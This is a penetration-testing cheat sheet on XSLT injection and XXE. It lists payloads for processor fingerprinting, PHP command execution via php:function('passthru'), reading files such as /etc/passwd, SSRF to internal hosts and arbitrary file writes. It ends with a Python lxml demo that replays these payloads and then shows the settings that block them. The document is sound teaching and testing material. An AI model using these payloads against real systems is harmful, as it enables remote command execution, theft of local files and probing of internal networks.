# XXE & XSLT Injection

### Preparation

First, inject `system-property()` lookups to fingerprint the XSLT processor. The vendor and version tell you which engine is on the other side and therefore which extension functions are worth trying (libxslt reports `libxslt` and XSLT version `1.0`; PHP's `XSLTProcessor` is libxslt underneath, while Java stacks are usually Xalan or Saxon):

```xml
<xsl:value-of select="system-property('xsl:version')" />
<xsl:value-of select="system-property('xsl:vendor')" />
<xsl:value-of select="system-property('xsl:vendor-url')" />
```

### RCE (Remote Code Execution)

One route to RCE is a PHP backend whose `XSLTProcessor` has called `registerPHPFunctions()`: the stylesheet can then invoke arbitrary PHP functions through the `php` namespace, which must be declared on the `xsl:stylesheet` element as `xmlns:php="http://php.net/xsl"`. `passthru` writes the command output straight into the HTTP response; use `shell_exec` instead if you need the output returned into the document:

```xml
<!-- requires xmlns:php="http://php.net/xsl" on the xsl:stylesheet element -->
<xsl:value-of select="php:function('passthru', 'ls -al')" />
```

### LFR (Local File Read)

Local files can be pulled in with the `document()` function and copied into the output. The target is parsed as XML, so this only works on well-formed XML files (configuration files, deployment descriptors, other users' uploads); on libxslt a non-XML file such as `/etc/passwd` produces a parse error and an empty node-set. For arbitrary text use the external-entity trick below, or `unparsed-text()` on an XSLT 2.0 processor such as Saxon:

```xml
<xsl:copy-of select="document('/etc/passwd')" />
```

### XXE

If we control the XML that gets parsed (the data document or the stylesheet itself, both go through an XML parser), a classic external entity reads a local file. The entity declaration and the `&ext_file;` reference have to be in the same document, so both go into whichever file we control; if that is the data document, the stylesheet must still output the node that contains the reference (for example with `<xsl:value-of select="/"/>`):

```xml
<!-- top of the file we control, before the root element: -->
<!DOCTYPE dtd_sample [<!ENTITY ext_file SYSTEM "/etc/passwd">]>

<!-- anywhere in the same file where text is emitted: -->
INFO &ext_file;
```

### SSRF

`document()` fetches URLs as well as files, so the same primitive reaches internal services from the server. The response is parsed as XML, so a non-XML reply usually surfaces only as an error or an empty result; read the error text and the response timing, or point the request at a host you control to confirm the outbound connection. An external entity with `SYSTEM "http://..."` in a DOCTYPE gives the same probe through the XML parser.

```xml
<xsl:copy-of select="document('http://[internal ip]:[port]')" />
```

### Writing to Files

libxslt implements the EXSLT `document` extension element, so a stylesheet can write a file anywhere the process has write access. The namespace must be declared and listed in `extension-element-prefixes` (the prefix name itself is arbitrary); a relative `href` is resolved against the stylesheet's base URI or the output file, so use an absolute path when the location matters. Processors with write restrictions (`xsltproc --nowrite`, lxml's `XSLTAccessControl`) refuse the write:

```xml
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:exploit="http://exslt.org/common"
  extension-element-prefixes="exploit">
<xsl:template match="/">
    <exploit:document href="text.txt" method="text">
      testing
    </exploit:document>
</xsl:template>
</xsl:stylesheet>
```
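The fingerprinting, LFR, XXE and file-write primitives from the sections above, replayed end to end against libxslt through Python's lxml binding, alongside the parser and access-control settings a backend needs to stop them. This is an added example, not code from the original notes; it assumes lxml is installed and the temp directory is writable, and every XML document and "secret" file in it is constructed for the demo.

```python
"""
Added example: replay the XSLT-injection primitives above against libxslt via
lxml, then flip on the settings that stop them. Assumes lxml is installed and
the temp directory is writable; all XML and the "secret" files are constructed
for the demo (the passwd file stands in for /etc/passwd).
"""
import os
import shutil
import tempfile

from lxml import etree

XSL_NS = "http://www.w3.org/1999/XSL/Transform"
EXSL_NS = "http://exslt.org/common"


def stylesheet(body, doctype=""):
    """Wrap an injected template body in a minimal text-output stylesheet.
    `doctype` lets a payload carry its own entity declarations, which must sit
    in the same document as the &entity; reference that uses them."""
    return (
        f"{doctype}"
        f'<xsl:stylesheet version="1.0" xmlns:xsl="{XSL_NS}" xmlns:exsl="{EXSL_NS}" '
        f'extension-element-prefixes="exsl">'
        f'<xsl:output method="text"/>'
        f'<xsl:template match="/">{body}</xsl:template>'
        f"</xsl:stylesheet>"
    )


def transform(xml_text, xslt_text, hardened):
    """Apply an attacker-controlled stylesheet to an XML document.

    hardened=False is the naive backend: entities substituted, no access control.
    hardened=True is the fix: external entities are left unresolved and libxslt
    is denied file/network reads, file writes and directory creation.
    """
    parser = etree.XMLParser(resolve_entities=not hardened)
    try:
        doc = etree.fromstring(xml_text.encode(), parser)
        xslt_root = etree.fromstring(xslt_text.encode(), parser)
        if hardened:
            xslt = etree.XSLT(xslt_root, access_control=etree.XSLTAccessControl.DENY_ALL)
        else:
            xslt = etree.XSLT(xslt_root)
        return str(xslt(doc))
    except etree.LxmlError as exc:  # parse errors and access-control refusals land here
        return f"BLOCKED: {exc}"


def run_demo(hardened):
    """Run each primitive once and report what it achieved."""
    work = tempfile.mkdtemp(prefix="xslt-demo-")
    secret_xml = os.path.join(work, "config.xml")  # well-formed XML target
    secret_txt = os.path.join(work, "passwd")      # plain-text target
    dropped = os.path.join(work, "dropped.txt")    # where the write lands
    with open(secret_xml, "w") as fh:
        fh.write("<config><password>TOPSECRET-XML</password></config>")
    with open(secret_txt, "w") as fh:
        fh.write("root:x:0:0:root:/root:/bin/bash\n")
    data = "<root>benign input</root>"

    # Preparation: fingerprint the processor (libxslt answers "libxslt").
    vendor = transform(data, stylesheet(
        "<xsl:value-of select=\"system-property('xsl:vendor')\"/>"), hardened)

    # LFR: document() parses its target as XML, so aim it at an XML file.
    lfr = transform(data, stylesheet(
        f"<xsl:copy-of select=\"document('file://{secret_xml}')\"/>"), hardened)

    # XXE: an external entity reads arbitrary text; declaration and reference
    # live in the same document (here the stylesheet itself).
    xxe = transform(data, stylesheet(
        "INFO &ext_file;",
        doctype=f'<!DOCTYPE stylesheet [<!ENTITY ext_file SYSTEM "file://{secret_txt}">]>',
    ), hardened)

    # Write: exsl:document drops a file wherever the process can write.
    transform(data, stylesheet(
        f'<exsl:document href="file://{dropped}" method="text">testing</exsl:document>'
    ), hardened)

    result = {
        "vendor": vendor.strip(),
        "lfr_leaked": "TOPSECRET-XML" in lfr,
        "xxe_leaked": "root:x:0:0" in xxe,
        "file_written": os.path.exists(dropped),
    }
    shutil.rmtree(work, ignore_errors=True)
    return result


if __name__ == "__main__":
    print("vulnerable:", run_demo(hardened=False))
    print("hardened:  ", run_demo(hardened=True))
```

The hardened path is the fix to copy: never parse untrusted XML with `resolve_entities=True`, and never hand libxslt an attacker-influenced stylesheet without `XSLTAccessControl` (at minimum `DENY_WRITE` plus no network and no file reads). Note that `document()` and `exsl:document` are blocked by the transform-time access control, while the entity read is stopped by the parser setting; both are needed.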
